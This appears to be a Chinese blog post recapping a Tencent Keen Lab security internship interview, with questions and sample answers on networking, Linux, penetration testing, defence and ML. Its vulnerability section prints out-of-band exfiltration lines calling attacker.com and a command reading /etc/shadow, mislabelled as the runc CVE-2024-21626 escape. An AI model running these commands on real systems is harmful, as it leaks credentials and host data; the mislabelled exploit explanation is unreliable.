2025年渗透测试面试题总结-腾讯[实习]科恩实验室-安全工程师(题目+回答)
安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
目录
腾讯[实习]科恩实验室-安全工程师
一、网络与协议
1. TCP三次握手
2. SYN扫描原理
3. HTTPS证书机制
二、渗透测试实战
1. 完整渗透流程(以代码审计为例)
2. 高阶渗透案例:DNS重绑定攻击
三、Linux系统深度
1. 进程与线程对比
2. 特殊进程问题修复
3. 文件监控与调试
四、防御与溯源(护网核心)
1. 入侵痕迹检测矩阵
2. 自动化溯源框架
五、漏洞攻防进阶
1. DNS带外数据泄露
2. Redis未授权利用加固
3. Runc容器逃逸(CVE-2024-21626)
六、机器学习与算法
1. 恶意样本分类
2. 莱文斯坦距离实战
七、CTF技巧精要
1. 子域名收集工具链
2. 文件下载漏洞利用
腾讯[实习]科恩实验室-安全工程师
## 一面 时长:一个半小时1. tcp三次握手2. 介绍一次渗透测试过程- 讲了一次代码审计3. SSRF漏洞4. 内网渗透大致流程5. 再介绍一次难度比较高的渗透测试6. 防守方有哪些入侵检测手段,有哪些痕迹是可以抓到的7. 介绍进程和线程8. 进程和线程内存空间的关系9. 父子进程的介绍10. 孤儿进程和僵尸进程- 这个我讲反掉了11. kill一个进程的时候,都发生了那些事情,从父子进程角度讲12. 反弹shell的几种方式- 本质是用tcp协议传输bash程序13. att&ck矩阵的类别,介绍其中的CC14. 到域名下拿到命令执行的结果- 这部分没听清楚,面试的时候直接说了不知道,复盘听录音还是没怎么听清,但好像大概想问的是DNS域名解析获取命令执行回显15. Linux命令通配符16. 护网的溯源、威胁分析工作之类的问了十分钟左右- 完全不会,以后简历上再也不写护网了17. xx攻防演练中防守方有哪些手段,问的比较杂,主要就是问入侵痕迹检测和溯源之类的东西- 这部分也不太会18. SVM、KNN介绍19. 卷积神经网络介绍20. 莱文斯坦距离21. 搜索引擎算法- 不太了解,大概讲了下字典树22. 倒排索引23. 恶意样本给出函数家族的md5,如何进行分类- 从统计规律讲了下24. 反问## 二面 时长:半小时1. 第一个问题就直接问了护网,和一面问的差不多,直接裂开2. Linux开机自启动方式3. init.d脚本介绍4. Linux怎么查看程序调用了哪些文件5. 如何监控Linux文件操作- 问到这里就已经非常慌了,Linux比较进阶的操作都不是很会,而且面试官一直在叹气我日6. Linux有哪些系统调用- 不会7. GDB调试- 不会8. 查看Linux开放的网络端口、多线程状态9. 反弹shell的方式10. Linux下怎么隐藏文件11. 子域名收集12. DNS重绑定13. DNS解析的流程14. CC流量- 听都没听过15. ssh隧道- 面试没听清楚,听到隧道就以为是UDP穿越隧道开讲了16. https证书机制介绍17. burpsuite一些使用方法,插件开发方法18. nmap的基本操作19. syn开放链接原理20. redis漏洞利用21. runc容器逃逸原理22. 常见WAF种类(不知道为什么还特别问了长亭的WAF)23. MySQL的UAF- 没听过24. 算法题(比较简单,leetcode easy级别)25. Linux进程通信26. 反问一、网络与协议
1. TCP三次握手
mermaidsequenceDiagram Client->>Server: SYN=1, Seq=x Server-->>Client: SYN=1, ACK=1, Seq=y, Ack=x+1 Client->>Server: ACK=1, Seq=x+1, Ack=y+1
- 关键点:SYN洪水攻击利用半连接耗尽资源,防御需启用SYN Cookie
2. SYN扫描原理
bashnmap -sS 目标IP # 发送SYN不回应ACK,绕过基础日志
- 隐蔽性:不建立完整连接,被扫描主机仅见RST包
3. HTTPS证书机制
mermaidgraph LR A[客户端请求] --> B[服务端发送证书] B --> C{客户端验证} C -->|有效| D[用证书公钥加密会话密钥] C -->|无效| E[终止连接]
二、渗透测试实战
1. 完整渗透流程(以代码审计为例)
mermaidgraph TB A[信息收集] --> B[白盒审计] B --> C[漏洞定位:SSRF/反序列化] C --> D[外带数据:DNS泄露] D --> E[横向移动:Redis未授权] E --> F[权限维持:systemd服务注入]2. 高阶渗透案例:DNS重绑定攻击
场景:绕过SSRF防护
python# 攻击步骤 1. 注册域名:evil.com (TTL=0) 2. 首次解析返回内网IP(如172.16.0.1) 3. 二次解析返回127.0.0.1 4. 利用时间差访问内部服务
三、Linux系统深度
1. 进程与线程对比
特性 进程 线程 内存隔离 独立地址空间 共享进程内存 通信成本 高(IPC机制) 低(全局变量) 容错性 崩溃不影响其他进程 线程崩溃导致进程终止 2. 特殊进程问题修复
bash# 僵尸进程清理 ps -ef | grep defunct # 定位僵尸PID kill -9 父进程ID # 强制回收资源 # 孤儿进程接管 systemctl status init # 确认init进程状态3. 文件监控与调试
监控文件操作:
bashinotifywait -m -r /etc # 实时监控目录 auditctl -a exit,always -F dir=/var/log -F perm=wa # 审计日志篡改GDB调试核心命令:
bash(gdb) break *0x400520 # 内存断点 (gdb) x/20x $rsp # 查看栈数据 (gdb) p system # 打印函数地址
四、防御与溯源(护网核心)
1. 入侵痕迹检测矩阵
攻击阶段 检测手段 工具链 初始访问 异常登录地理定位 CrowdStrike/Elastic 持久化 开机自启动项扫描 Autoruns/Lynis 横向移动 内网ARP异常流量分析 Zeek/Arkime 数据外传 DNS隧道特征检测 Fiddler/Sigma规则 2. 自动化溯源框架
mermaidgraph LR A[告警触发] --> B{日志关联} B -->|WAF日志| C[提取攻击IP] B -->|系统日志| D[定位进程行为] C --> E[威胁情报查询] D --> F[进程树重建] E & F --> G[生成攻击链报告]
五、漏洞攻防进阶
1. DNS带外数据泄露
bash# 外传命令结果 curl http://$(whoami).attacker.com # HTTP泄露 dig `id | base64`.data.attacker.com # DNS泄露2. Redis未授权利用加固
防御方案:
redisrequirepass Str0ngP@ss! # 强密码认证 rename-command CONFIG "" # 禁用高危命令 bind 127.0.0.1 # 限制监听地址3. Runc容器逃逸(CVE-2024-21626)
原理:工作目录未隔离 → 挂载宿主机根目录
利用:bashdocker run --rm -it -v /:/host alpine chroot /host && cat /etc/shadow
六、机器学习与算法
1. 恶意样本分类
处理流程:
mermaidgraph TB A[样本集] --> B[提取API序列] B --> C[生成TF-IDF向量] C --> D[训练SVM分类器] D --> E[混淆矩阵验证]2. 莱文斯坦距离实战
pythondef levenshtein(s1, s2): if len(s1) < len(s2): return levenshtein(s2, s1) if len(s2) == 0: return len(s1) prev = range(len(s2) + 1) for i, c1 in enumerate(s1): curr = [i + 1] for j, c2 in enumerate(s2): curr.append(min(prev[j+1]+1, curr[j]+1, prev[j]+(c1!=c2))) prev = curr return prev[-1]
七、CTF技巧精要
1. 子域名收集工具链
bashsubfinder -d target.com -silent | httpx -status-code # 快速存活检测 waybackurls target.com | grep -E '\.js$' | uniq # 历史JS文件挖掘2. 文件下载漏洞利用
关键路径:
textLinux: /proc/self/cwd/flag.txt # 进程工作目录 Windows: C:\Windows\Panther\setup.log # 安装日志
特别警示:护网面试重点考察 攻击链重构能力 与 防御体系设计思维,建议掌握以下实战组合:
- 溯源:ELK+威胁情报平台(如微步在线)
- 反制:高交互蜜罐(如HFish)
- 加固:CIS基准扫描+自动化补丁管理
相关文章:
2025年渗透测试面试题总结-腾讯[实习]科恩实验室-安全工程师(题目+回答)
安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。 目录 腾讯[实习]科恩实验室-安全工程师 一、网络与协议 1. TCP三次握手 2. SYN扫描原理 3. HTTPS证书机制 二…...
uniapp手机号一键登录保姆级教程(包含前端和后端)
目录 前置条件创建uniapp项目并关联uniClound云空间开启一键登录模块并开通一键登录服务编写云函数并上传部署获取手机号流程(第一种) 前端直接调用云函数获取手机号(第三种)后台调用云函数获取手机号 错误码常见问题 前置条件 手机安装有sim卡手机开启…...
JavaScript 数据类型详解
JavaScript 数据类型详解 JavaScript 数据类型分为 原始类型(Primitive) 和 对象类型(Object) 两大类,共 8 种(ES11): 一、原始类型(7种) 1. undefined 定…...
【Linux】Linux 系统默认的目录及作用说明
博主介绍:✌全网粉丝23W,CSDN博客专家、Java领域优质创作者,掘金/华为云/阿里云/InfoQ等平台优质作者、专注于Java技术领域✌ 技术范围:SpringBoot、SpringCloud、Vue、SSM、HTML、Nodejs、Python、MySQL、PostgreSQL、大数据、物…...
RSS 2025|从说明书学习复杂机器人操作任务:NUS邵林团队提出全新机器人装配技能学习框架Manual2Skill
视觉语言模型(Vision-Language Models, VLMs),为真实环境中的机器人操作任务提供了极具潜力的解决方案。 尽管 VLMs 取得了显著进展,机器人仍难以胜任复杂的长时程任务(如家具装配),主要受限于人…...
搭建DNS域名解析服务器(正向解析资源文件)
正向解析资源文件 1)准备工作 服务端及客户端都关闭安全软件 [rootlocalhost ~]# systemctl stop firewalld [rootlocalhost ~]# setenforce 0 2)服务端安装软件:bind 1.配置yum源 [rootlocalhost ~]# cat /etc/yum.repos.d/base.repo [Base…...
【Nginx】使用 Nginx+Lua 实现基于 IP 的访问频率限制
使用 NginxLua 实现基于 IP 的访问频率限制 在高并发场景下,限制某个 IP 的访问频率是非常重要的,可以有效防止恶意攻击或错误配置导致的服务宕机。以下是一个详细的实现方案,使用 Nginx 和 Lua 脚本结合 Redis 来实现基于 IP 的访问频率限制…...
腾讯云V3签名
想要接入腾讯云的Api,必然先按其文档计算出所要求的签名。 之前也调用过腾讯云的接口,但总是卡在签名这一步,最后放弃选择SDK,这次终于自己代码实现。 可能腾讯云翻新了接口文档,现在阅读起来,清晰了很多&…...
MySQL JOIN 表过多的优化思路
当 MySQL 查询涉及大量表 JOIN 时,性能会显著下降。以下是优化思路和简易实现方法: 一、核心优化思路 减少 JOIN 数量 数据冗余:添加必要的冗余字段(如订单表直接存储用户名)合并表:将频繁关联的小表合并成…...
mac 安装homebrew (nvm 及git)
mac 安装nvm 及git 万恶之源 mac 安装这些东西离不开Xcode。及homebrew 一、先说安装git步骤 通用: 方法一:使用 Homebrew 安装 Git(推荐) 步骤如下:打开终端(Terminal.app) 1.安装 Homebrew…...
)
C++课设:简易日历程序(支持传统节假日 + 二十四节气 + 个人纪念日管理)
名人说:路漫漫其修远兮,吾将上下而求索。—— 屈原《离骚》 创作者:Code_流苏(CSDN)(一个喜欢古诗词和编程的Coder😊) 专栏介绍:《编程项目实战》 目录 一、为什么要开发一个日历程序?1. 深入理解时间算法2. 练习面向对象设计3. 学习数据结构应用二、核心算法深度解析…...
【C++进阶篇】智能指针
C内存管理终极指南:智能指针从入门到源码剖析 一. 智能指针1.1 auto_ptr1.2 unique_ptr1.3 shared_ptr1.4 make_shared 二. 原理三. shared_ptr循环引用问题三. 线程安全问题四. 内存泄漏4.1 什么是内存泄漏4.2 危害4.3 避免内存泄漏 五. 最后 一. 智能指针 智能指…...
CRMEB 中 PHP 短信扩展开发:涵盖一号通、阿里云、腾讯云、创蓝
目前已有一号通短信、阿里云短信、腾讯云短信扩展 扩展入口文件 文件目录 crmeb\services\sms\Sms.php 默认驱动类型为:一号通 namespace crmeb\services\sms;use crmeb\basic\BaseManager; use crmeb\services\AccessTokenServeService; use crmeb\services\sms\…...
站群服务器的应用场景都有哪些?
站群服务器主要是为了多个网站的托管和管理所设计的,可以通过集中管理和高效资源的分配,来支持多个独立的网站同时运行,让每一个网站都可以分配到独立的IP地址,避免出现IP关联的风险,用户还可以通过控制面板进行管理功…...
scikit-learn机器学习
# 同时添加如下代码, 这样每次环境(kernel)启动的时候只要运行下方代码即可: # Also add the following code, # so that every time the environment (kernel) starts, # just run the following code: import sys sys.path.append(/home/aistudio/external-libraries)机…...
)
C#学习第29天:表达式树(Expression Trees)
目录 什么是表达式树? 核心概念 1.表达式树的构建 2. 表达式树与Lambda表达式 3.解析和访问表达式树 4.动态条件查询 表达式树的优势 1.动态构建查询 2.LINQ 提供程序支持: 3.性能优化 4.元数据处理 5.代码转换和重写 适用场景 代码复杂性…...
【JavaSE】多线程基础学习笔记
多线程基础 -线程相关概念 程序(Program) 是为完成特定任务、用某种语言编写的一组指令的集合简单的说:就是我们写的代码 进程 进程是指运行中的程序,比如我们使用QQ,就启动了一个进程,操作系统就会为该进程分配内存…...
接口自动化测试:HttpRunner基础
相关文档 HttpRunner V3.x中文文档 HttpRunner 用户指南 使用HttpRunner 3.x实现接口自动化测试 HttpRunner介绍 HttpRunner 是一个开源的 API 测试工具,支持 HTTP(S)/HTTP2/WebSocket/RPC 等网络协议,涵盖接口测试、性能测试、数字体验监测等测试类型…...
STM32HAL库USART源代码解析及应用
STM32HAL库USART源代码解析 前言STM32CubeIDE配置串口USART和UART的选择使用模式参数设置GPIO配置DMA配置中断配置硬件流控制使能生成代码解析和使用方法串口初始化__UART_HandleTypeDef结构体浅析HAL库代码实际使用方法使用轮询方式发送使用轮询方式接收使用中断方式发送使用中…...
CSS | transition 和 transform的用处和区别
省流总结: transform用于变换/变形,transition是动画控制器 transform 用来对元素进行变形,常见的操作如下,它是立即生效的样式变形属性。 旋转 rotate(角度deg)、平移 translateX(像素px)、缩放 scale(倍数)、倾斜 skewX(角度…...
Go语言多线程问题
打印零与奇偶数(leetcode 1116) 方法1:使用互斥锁和条件变量 package mainimport ("fmt""sync" )type ZeroEvenOdd struct {n intzeroMutex sync.MutexevenMutex sync.MutexoddMutex sync.Mutexcurrent int…...
)
GitHub 趋势日报 (2025年06月06日)
📊 由 TrendForge 系统生成 | 🌐 https://trendforge.devlive.org/ 🌐 本日报中的项目描述已自动翻译为中文 📈 今日获星趋势图 今日获星趋势图 590 cognee 551 onlook 399 project-based-learning 348 build-your-own-x 320 ne…...
【JVM】Java虚拟机(二)——垃圾回收
目录 一、如何判断对象可以回收 (一)引用计数法 (二)可达性分析算法 二、垃圾回收算法 (一)标记清除 (二)标记整理 (三)复制 (四ÿ…...
: 一刀斩断视频片头广告)
快刀集(1): 一刀斩断视频片头广告
一刀流:用一个简单脚本,秒杀视频片头广告,还你清爽观影体验。 1. 引子 作为一个爱生活、爱学习、爱收藏高清资源的老码农,平时写代码之余看看电影、补补片,是再正常不过的事。 电影嘛,要沉浸,…...
并发编程 - go版
1.并发编程基础概念 进程和线程 A. 进程是程序在操作系统中的一次执行过程,系统进行资源分配和调度的一个独立单位。B. 线程是进程的一个执行实体,是CPU调度和分派的基本单位,它是比进程更小的能独立运行的基本单位。C.一个进程可以创建和撤销多个线程;同一个进程中…...
Webpack性能优化:构建速度与体积优化策略
一、构建速度优化 1、升级Webpack和Node.js 优化效果:Webpack 4比Webpack 3构建时间降低60%-98%。原因: V8引擎优化(for of替代forEach、Map/Set替代Object)。默认使用更快的md4哈希算法。AST直接从Loa…...
Redis:现代应用开发的高效内存数据存储利器
一、Redis的起源与发展 Redis最初由意大利程序员Salvatore Sanfilippo在2009年开发,其初衷是为了满足他自己的一个项目需求,即需要一个高性能的键值存储系统来解决传统数据库在高并发场景下的性能瓶颈。随着项目的开源,Redis凭借其简单易用、…...
MySQL 8.0 事务全面讲解
以下是一个结合两次回答的 MySQL 8.0 事务全面讲解,涵盖了事务的核心概念、操作示例、失败回滚、隔离级别、事务性 DDL 和 XA 事务等内容,并修正了查看隔离级别的命令。 MySQL 8.0 事务全面讲解 一、事务的核心概念(ACID) 事务是…...
免费数学几何作图web平台
光锐软件免费数学工具,maths,数学制图,数学作图,几何作图,几何,AR开发,AR教育,增强现实,软件公司,XR,MR,VR,虚拟仿真,虚拟现实,混合现实,教育科技产品,职业模拟培训,高保真VR场景,结构互动课件,元宇宙http://xaglare.c…...
基于Springboot+Vue的办公管理系统
角色: 管理员、员工 技术: 后端: SpringBoot, Vue2, MySQL, Mybatis-Plus 前端: Vue2, Element-UI, Axios, Echarts, Vue-Router 核心功能: 该办公管理系统是一个综合性的企业内部管理平台,旨在提升企业运营效率和员工管理水…...